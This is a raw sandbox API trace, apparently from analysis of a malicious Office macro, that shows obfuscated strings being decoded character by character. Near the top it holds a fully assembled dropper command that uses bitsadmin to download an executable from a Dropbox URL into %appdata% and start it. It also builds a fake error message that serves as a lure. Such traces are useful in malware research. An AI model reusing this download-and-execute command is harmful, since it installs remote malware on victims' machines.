bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuo", bstrRight="ldw.exe &start %appdata%\\iuol", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.154] VarBstrCat (in: bstrLeft=0x0, bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0017.154] VarBstrCat (in: bstrLeft="d", bstrRight="w", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0017.154] VarBstrCat (in: bstrLeft="dw", bstrRight=".", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x797cf48, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.154] VarBstrCat (in: bstrLeft="dw.", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0017.155] VarBstrCat (in: bstrLeft="dw.e", bstrRight="x", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b818, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.155] VarBstrCat (in: bstrLeft="dw.ex", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="%", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="%\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0017.155] VarBstrCat (in: bstrLeft="dw.exe", bstrRight="\"", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuol", bstrRight="dw.exe\"", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="H", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="H\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0017.155] VarBstrCat (in: bstrLeft=0x0, bstrRight="E", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.155] VarBstrCat (in: bstrLeft="E", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.155] VarBstrCat (in: bstrLeft="Er", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.155] VarBstrCat (in: bstrLeft="Err", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.155] VarBstrCat (in: bstrLeft="Erro", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.155] VarBstrCat (in: bstrLeft="Error", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0017.155] VarBstrCat (in: bstrLeft="Error ", bstrRight="1", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="<", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="<\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0017.155] VarBstrCat (in: bstrLeft="Error 1", bstrRight="9", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19", bstrRight="8", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="7") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 198", bstrRight="7", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="4") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 1987", bstrRight="4", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19874", bstrRight=":", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19874:", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19874: ", bstrRight="Y", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19874: Y", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19874: Yo", bstrRight="u", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19874: You", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0017.156] VarBstrCat (in: bstrLeft="Error 19874: You ", bstrRight="m", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] VarBstrCat (in: bstrLeft=0x0, bstrRight="Error 19874: You m", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0017.156] VarBstrCat (in: bstrLeft=0x0, bstrRight="u", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.156] VarBstrCat (in: bstrLeft="u", bstrRight="s", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.156] VarBstrCat (in: bstrLeft="us", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.157] VarBstrCat (in: bstrLeft="ust", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0017.157] VarBstrCat (in: bstrLeft="ust ", bstrRight="h", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.157] VarBstrCat (in: bstrLeft="ust h", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0017.157] VarBstrCat (in: bstrLeft="ust ha", bstrRight="v", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.157] VarBstrCat (in: bstrLeft="ust hav", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.157] VarBstrCat (in: bstrLeft="ust have", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x96Êðþ\x07", 